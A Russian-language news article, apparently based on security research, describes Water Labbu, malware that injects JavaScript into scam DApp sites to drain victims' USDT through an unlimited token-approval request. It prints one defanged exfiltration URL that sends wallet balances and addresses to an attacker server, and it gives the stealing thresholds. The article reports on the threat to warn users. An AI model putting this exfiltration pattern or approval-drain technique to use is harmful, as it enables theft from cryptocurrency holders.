Как Water Labbu крадет криптовалюты у мошенников

7 октября, 2022 / Интересное

кража эфириум rugpull

ПО Water Labbu извлекает выгоду из схем социальной инженерии других мошенников, за счет внедрения вредоносного кода JavaScript в децентрализованные приложения для кражи криптовалюты.

Исследователи из MicroTrend обнаружили вредоносное ПО Water Labbu, атаковавшее сервисы, направленные на мошенничество с криптовалютой. Как правило, криптомошенники используют методы социальной инженерии, чтобы завоевать доверие жертвы. В свою очередь, Water Labbu производит кражу криптовалюты с помощью аналогичного метода, не используя социальную инженерию — по крайней мере, напрямую. Вместо этого Water Labbu позволяет другим мошенникам использовать свои уловки социальной инженерии для обмана ничего не подозревающих жертв.

Когда злоумышленник находит жертву, у которой в кошельке, подключенном к одному из мошеннических сайтов, хранится большое количество криптовалюты, введенная полезная нагрузка JavaScript отправляет запрос на получение разрешений. Запрос замаскирован так, как будто он был отправлен со взломанного сайта, и запрашивает разрешение (разрешение на использование токенов) для перевода почти неограниченного количества USD Tether (USDT, который представляет собой стабильную монету, привязанную к доллару США со стоимостью 1 :1) из кошелька цели.

Целям Water Labbu внушают, что запрос был первоначально выдан DApp, однако предоставленное разрешение принадлежит не криптоадресам оригинального мошенника, а другому адресу, контролируемому Water Labbu.

На данный момент известно о 45 мошеннических сайтах DApp, связанных с криптовалютой, которые были скомпрометированы Water Labbu. Эти сайты имеют схожие стили и темы с сайтами, используемыми в мошенничестве с ликвидностью без убытков.

Проверив записи транзакций адресов злоумышленников в блокчейне Ethereum, было обнаружено, что они успешно украли средства как минимум у девяти разных жертв на общую сумму не менее $316 728.

Анализ процесса кражи криптовалюты

Метод Water Labbu включает в себя компрометацию мошеннических веб-сайтов DApp и внедрение в них полезной нагрузки JavaScript.

Эксперты заметили следующее поведение:

  • Если жертва загружает скрипт с мобильного устройства Android или iOS, он внедряет скрипт первого этапа с возможностями кражи криптовалюты.
  • Если жертва загружает сценарий с рабочего стола Windows, он внедряет другой сценарий, показывающий поддельное сообщение об обновлении Flash с просьбой загрузить вредоносный исполняемый файл.

Стоит отметить, что сервер доставки реализует механизм, позволяющий избежать многократной загрузки скрипта с одного и того же IP-адреса в течение короткого промежутка времени. Если IP-адрес обращался к серверу доставки за последние несколько часов или тип устройства, которое использует жертва, не соответствует другим необходимым условиям, он вернет простой скрипт, который соберет данные cookie и LocalStorage и отправит их обратно на сервер доставки.

Скрипт кражи криптовалюты: первый этап

Изначально загружается библиотека web3.js. Это дает скрипту возможность подключиться к кошельку жертвы, хотя вредоносный скрипт будет связываться с кошельком жертвы, только если кошелек жертвы подключен к скомпрометированному сайту DApp. Получение доступа к кошельку позволяет Water Labbu идентифицировать адрес Ethereum и баланс цели. Скрипт также взаимодействует со смарт-контрактом Tether USD для получения баланса USDT жертвы. Если кошелек содержит более 0,001 ETH или более 1 USDT, он отправит информацию о балансе кошелька и адрес кошелька на сервер сбора информации, linkstometa[.]com, через HTTP-запрос.

Текст ниже отображает запрос на эксфильтрацию баланса кошелька:

hxxps[:]//linkstometa[.]com/data/?get&s=[%22{баланс ETH}%22,%22{баланс USDT}%22]&j={адрес Ethereum}

Скрипт кражи криптовалюты: второй этап

Запрос на эксфильтрацию развернет сценарий второго этапа, как только указанный баланс будет иметь баланс ETH выше 0,005 ETH и баланс токена USDT выше 22 000 USDT. В противном случае он вернет пустую полезную нагрузку и оставит жертв для других мошенников. Во время сценария второго этапа выполняется еще одна проверка баланса и запрашивается разрешение на использование токенов.

water_labu_token_transfer

Запрос на одобрение токена просит жертв предоставить разрешение на указанный адрес для завершения транзакций и расходования криптовалютных активов. Вредоносный скрипт запрашивает ограничение на одобрение в размере 10^32 USDT, что намного превышает общее количество доступных токенов USDT в блокчейне. Когда выдается запрос «утвердить», приложения кошелька криптовалюты будут просить пользователей просмотреть детали запроса перед подтверждением. Если жертва не проверит тщательно данные запроса и не предоставит разрешения на адрес Water Labbu, злоумышленник сможет перевести все USDT из кошелька жертвы.

water_labu_address

Water Labbu удалось украсть средства в криптовалюте на сумму $316 728, внедрив свои вредоносные скрипты на мошеннические веб-сайты других мошенников, демонстрируя готовность использовать методы других злоумышленников в своих целях.

Таким образом, пользователям стоит остерегаться любых приглашений к инвестициям, которые исходят от ненадежных сторон. Кроме того, им не следует торговать криптовалютными средствами на какой-либо неизвестной платформе без тщательной проверки ее законности, понимания того, что она делает и как она работает.

Комментарии

Актуально

VK:083211